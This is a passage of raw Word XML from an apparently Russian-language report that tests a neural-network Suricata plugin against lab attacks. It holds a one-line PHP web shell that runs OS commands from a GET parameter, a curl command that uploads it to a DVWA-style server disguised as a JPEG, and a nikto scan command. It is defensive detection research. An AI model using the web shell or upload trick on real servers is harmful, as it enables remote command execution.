      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD74AB" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, тогда как реальное содержимое файла представляет собой исполняемый PHP-скрипт. После успешной загрузки файл размещается на сервере в доступной директории, что позволяет выполнять произвольные команды операционной системы через HTTP-запрос.</w:t>
      </w:r>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> С атакующей машины был создан файл с расширением PHP, замаскированный под изображение, и загружен на целевой сервер:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C82F3FC" w14:textId="77777777" w:rsidR="00BD74AB" w:rsidRPr="001D324E" w:rsidRDefault="00BD74AB" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232F493C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00A10D48" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> system($_GET["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;' &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6819396B" w14:textId="569E2D0D" w:rsidR="008E0171" w:rsidRPr="009534A2" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl - b cookies.txt - F </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidRPr="00A10D48">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>uploaded=@shell.php;type=image/jpeg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- F "Upload=Upload" </w:t>
      </w:r>
      <w:r w:rsidR="009534A2" w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://192.168.0.104/vulnerabilities/upload/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07AE57" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="009534A2" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2279373F" w14:textId="340B45E1" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00BD74AB">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t xml:space="preserve">Загрузка исполняемого файла под видом изображения формирует аномальный POST-запрос с нетипичным содержимым. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Процесс обнаружения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCF06E" w14:textId="77777777" w:rsidR="009534A2" w:rsidRDefault="009534A2" w:rsidP="00BD74AB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F49237C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39EA128C" wp14:editId="30C60090">
            <wp:extent cx="6273681" cy="2867025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2126384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84695" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6282174" cy="2870906"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E31D58" w14:textId="0DD3DFA6" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Обнаружение небезопасной загрузки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE995E1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F303A2" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E27BB91"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lastRenderedPageBreak/>
        <w:t>Нейросетевой плагин зафиксировал аномалию по признакам асимметрии трафика и нетипичного объёма передаваемых данных.</w:t>
      </w:r>
      <w:r w:rsidRPr="006221DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006221DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В ходе проведения теста была выявлена существенная практическая проблема</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006221DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">атака типа File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006221DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006221DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> генерирует единственный аномальный HTTP-запрос, тогда как фоновый уровень ложных срабатываний нейросетевого модуля составляет около 15%. Это означает, что единичный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006221DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алерт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006221DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с уверенностью ниже 90% статистически неотличим от ложного срабатывания на легитимный трафик сети. Таким образом, для надёжного обнаружения точечных атак, не генерирующих характерного объёма трафика, необходимо либо снижение порога ложных срабатываний путём дообучения модели на трафике конкретной сети, либо введение дополнительного уровня анализа — инспекции содержимого HTTP-запросов или корреляции событий с другими источниками данных.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не сформировала.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555399EB"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0344AA1C" w14:textId="215856CA" w:rsidR="008E0171" w:rsidRPr="00BD74AB" w:rsidRDefault="00BD74AB" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.13 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 13. Сканирование уязвимых компонентов </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3EB090"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t xml:space="preserve">Для тестирования использовался инструмент </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, осуществляющий автоматизированное сканирование веб-сервера на наличие известных уязвимостей в установленных компонентах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49109CE2" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="001D324E" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C086D98" w14:textId="657B431E" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:r w:rsidR="009534A2" w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.0.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71898F33" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00A10D48" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A610C34" w14:textId="3FF9ED6D" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> генерирует большое количество специфических HTTP-запросов, проверяя сервер на наличие уязвимых версий программного обеспечения, небезопасных конфигураций. Данный паттерн трафика схож со сканированием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Процесс обнаружения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381DF245"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6FE41090" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
